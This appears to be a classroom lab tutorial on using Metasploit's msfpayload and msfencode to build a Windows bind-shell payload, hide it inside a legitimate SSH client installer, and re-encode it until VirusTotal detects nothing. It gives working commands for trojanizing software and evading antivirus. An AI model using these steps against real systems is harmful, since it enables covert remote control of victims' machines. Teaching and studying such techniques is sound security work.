Jul 27, 2012
81 Views

Bypassing Antivirus with Msfencode

Written by

What You Need

  • A BackTrack Linux machine, real or virtual. I used BackTrack 5 R2, but other versions of BackTrack are probably OK too.

WARNING

We are using some harmless test files, but don’t infect people with any real viruses–that’s a crime!

Purpose

Antivirus protects machines from malware, but not all of it. There are ways to pack malware to make it harder to detect. We’ll use metasploit to render malware completely invisible to antivirus.

 

Creating a Listener

This is a simple payload that gives the attacker remote control of a machine. It is not a virus, and won’t spread, but it is detected by antivirus engines.

In BackTrack, in a Terminal window, execute these commands:

</code><code><big><strong>cd</strong></big>msfpayload windows/shell_bind_tcp LPORT=2482 X > /root/listen.exe

<big><strong>ls −l listen.exe</strong></big>

You should see the listen.exe file, as shown below:

 

Analyzing the Listener with VirusTotal

In BackTrack, click ApplicationsInternet, “Firefox Web Browser“.

In Firefox, go to https://www.virustotal.com/

Click the “Choose File” button. Navigate to /root and double-click the listen.exe

“listen.exe” appears in the “Choose File” box, as shown below:

In the VirusTotal web page, click the “Scan It!” button.

If you see a “File already analyzed” message, click the “View last analysis” button.

The analysis shows that many of the antivirus engines detected the file–33 out of 42, when I did it, as shown below. You may see different numbers, but many of the engines should detect it.

 

Saving the Screen Image

Make sure the result is visible, showing something like “Detection rate: 33/42“, as shown above.

Save a screen capture with a filename of “Proj 6xa from YOUR NAME“.

 

Encoding the Listener

This process will encode the listener, and insert it into an innocent SSH file.

In BackTrack, in a Terminal window, execute these commands:

</code><code><big><strong>wget ftp://ftp.ccsf.edu/pub/SSH/sshSecureShellClient−3.2.9.exe</strong></big>msfencode -i /root/listen.exe -t exe -x /root/sshSecureShellClient-3.2.9.exe -k -o /root/evil_ssh.exe -e x86/shikata_ga_nai -c 1

<big><strong>ls −l evil*</strong></big>

You should see the evil-ssh.exe file, as shown below:

 

Analyzing the Encoded Listener with VirusTotal

In Firefox, go to https://www.virustotal.com/

Click the “Choose File” button. Navigate to /root and double-click the evil-ssh.exe file.

In the VirusTotal web page, click the “Scan It!” button.

If you see a “File already analyzed” message, click the “View last analysis” button.

The analysis shows that fewer of the antivirus engines detect the file now–21 out of 42, when I did it, as shown below. You may see different numbers.

 

Encoding the Listener Again

This process will encode the listener with several different encodings, as recommended by Keith Burton (Thanks!).

 

In BackTrack, in a Terminal window, execute these commands:

</code><code><big><strong>msfencode −i /root/listen.exe −t raw −o /root/listen2.exe −e x86/shikata_ga_nai −c 1</strong></big>msfencode -i /root/listen2.exe -t raw -o /root/listen3.exe -e x86/jmp_call_additive -c 1

msfencode -i /root/listen3.exe -t raw -o /root/listen4.exe -e x86/call4_dword_xor -c 1

msfencode -i /root/listen4.exe -o /root/listen5.exe -e x86/shikata_ga_nai -c 1

<big><strong>ls −l listen*</strong></big>

You should see several files, as shown below:

 

Analyzing the Encoded Listener with VirusTotal

In Firefox, go to https://www.virustotal.com/

Click the “Choose File” button. Navigate to /root and double-click the listen5.exe file.

In the VirusTotal web page, click the “Scan It!” button.

If you see a “File already analyzed” message, click the “View last analysis” button.

The analysis shows that fewer of the antivirus engines detect the file now–0 out of 42, when I did it, as shown below. You may see different numbers.

Sources

http://www.damballa.com/downloads/r_pubs/WP_SerialVariantEvasionTactics.pdf

http://synjunkie.blogspot.com/2008/10/metasploit-payloads-msfpayload.html

http://carnal0wnage.attackresearch.com/2010/03/msfencode-msfpayload-into-existing.html

http://www.securitylabs.in/2011/12/easy-bypass-av-and-firewall.html

Article Tags:
· · · · · · ·
Article Categories:
Bug & Security · Virut/Trojan
    http://linholiver.com

    https://linholiver.com/diary/about/